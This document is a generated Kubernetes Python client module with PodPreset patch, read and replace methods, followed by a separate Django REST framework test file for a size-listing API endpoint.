>>> thread = api.patch_namespaced_pod_preset(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the PodPreset (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1Patch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1PodPreset
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_namespaced_pod_preset_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.patch_namespaced_pod_preset_with_http_info(name, namespace, body, **kwargs)
return data
def patch_namespaced_pod_preset_with_http_info(self, name, namespace, body, **kwargs):
"""
partially update the specified PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_namespaced_pod_preset_with_http_info(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the PodPreset (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1Patch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1PodPreset
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_pod_preset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_namespaced_pod_preset`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `patch_namespaced_pod_preset`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_namespaced_pod_preset`")
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/namespaces/{namespace}/podpresets/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1PodPreset',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
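    # Illustrative sketch: this endpoint accepts json-patch, merge-patch and
    # strategic-merge-patch Content-Types; the generated header negotiation
    # above falls back to the first listed type (json-patch), so an RFC 6902
    # operation list is the natural body here (path and value hypothetical).
    #
    #   patch = [{"op": "replace", "path": "/spec/env/0/value",
    #             "value": "updated"}]
    #   patched = api.patch_namespaced_pod_preset("demo-preset", "default",
    #                                             patch)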
def read_namespaced_pod_preset(self, name, namespace, **kwargs):
"""
read the specified PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_namespaced_pod_preset(name, namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the PodPreset (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'.
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1alpha1PodPreset
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.read_namespaced_pod_preset_with_http_info(name, namespace, **kwargs)
else:
(data) = self.read_namespaced_pod_preset_with_http_info(name, namespace, **kwargs)
return data
def read_namespaced_pod_preset_with_http_info(self, name, namespace, **kwargs):
"""
read the specified PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_namespaced_pod_preset_with_http_info(name, namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the PodPreset (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'.
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1alpha1PodPreset
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'pretty', 'exact', 'export']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_pod_preset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_namespaced_pod_preset`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_namespaced_pod_preset`")
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/namespaces/{namespace}/podpresets/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'exact' in params:
query_params['exact'] = params['exact']
if 'export' in params:
query_params['export'] = params['export']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1PodPreset',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
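    # Illustrative sketch: reading one preset back; export=True (documented
    # above) strips fields a user cannot set (name hypothetical).
    #
    #   preset = api.read_namespaced_pod_preset("demo-preset", "default",
    #                                           export=True)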
def replace_namespaced_pod_preset(self, name, namespace, body, **kwargs):
"""
replace the specified PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_namespaced_pod_preset(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the PodPreset (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1PodPreset body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1PodPreset
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.replace_namespaced_pod_preset_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.replace_namespaced_pod_preset_with_http_info(name, namespace, body, **kwargs)
return data
def replace_namespaced_pod_preset_with_http_info(self, name, namespace, body, **kwargs):
"""
replace the specified PodPreset
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_namespaced_pod_preset_with_http_info(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the PodPreset (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1PodPreset body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1PodPreset
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_pod_preset" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_namespaced_pod_preset`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_namespaced_pod_preset`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_namespaced_pod_preset`")
collection_formats = {}
resource_path = '/apis/settings.k8s.io/v1alpha1/namespaces/{namespace}/podpresets/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1PodPreset',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
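# Illustrative end-to-end sketch, not generated code: replace implements the
# usual read-modify-PUT pattern. The server rejects the PUT with a conflict if
# the stored resourceVersion changed in between; names are hypothetical and
# spec.env is assumed to be populated.
#
#   current = api.read_namespaced_pod_preset("demo-preset", "default")
#   current.spec.env.append(client.V1EnvVar(name="EXTRA", value="1"))
#   updated = api.replace_namespaced_pod_preset("demo-preset", "default",
#                                               current)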
|
skuda/client-python
|
kubernetes/client/apis/settings_v1alpha1_api.py
|
Python
|
apache-2.0
| 58,259
|
from rest_framework.test import APITestCase, APIRequestFactory,\
force_authenticate
from api.v2.views import SizeViewSet
from api.tests.factories import ProviderFactory, UserFactory,\
AnonymousUserFactory, SizeFactory, IdentityFactory
from django.core.urlresolvers import reverse
from core.models import Size
class GetSizeListTests(APITestCase):
def setUp(self):
self.anonymous_user = AnonymousUserFactory()
self.user = UserFactory.create()
self.provider = ProviderFactory.create()
self.user_identity = IdentityFactory.create_identity(
created_by=self.user,
provider=self.provider)
self.size = SizeFactory.create(provider=self.provider,
cpu=10,
disk=20,
root=0,
mem=126)
self.view = SizeViewSet.as_view({'get': 'list'})
factory = APIRequestFactory()
url = reverse('api:v2:size-list')
self.request = factory.get(url)
def test_is_public(self):
force_authenticate(self.request, user=self.anonymous_user)
response = self.view(self.request)
        self.assertEqual(response.status_code, 200)
def test_response_is_paginated(self):
force_authenticate(self.request, user=self.user)
response = self.view(self.request)
        self.assertEqual(response.data['count'], 1)
        self.assertEqual(len(response.data.get('results')), 1)
def test_response_contains_expected_fields(self):
force_authenticate(self.request, user=self.user)
response = self.view(self.request)
data = response.data.get('results')[0]
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(data), 13, "Number of fields does not match")
        self.assertEqual(data['id'], self.size.id)
        self.assertIn('url', data)
        self.assertEqual(data['name'], self.size.name)
        self.assertEqual(data['alias'], self.size.alias)
self.assertIn('uuid', data)
self.assertIn('cpu', data)
self.assertIn('disk', data)
self.assertIn('root', data)
self.assertIn('mem', data)
self.assertIn('active', data)
self.assertIn('provider', data)
self.assertIn('start_date', data)
self.assertIn('end_date', data)
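# A usage note, not part of the original tests: assuming a standard manage.py
# at the project root, this module would typically be run with
#
#   python manage.py test api.tests.v2.test_sizes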
|
CCI-MOC/GUI-Backend
|
api/tests/v2/test_sizes.py
|
Python
|
apache-2.0
| 2,409
|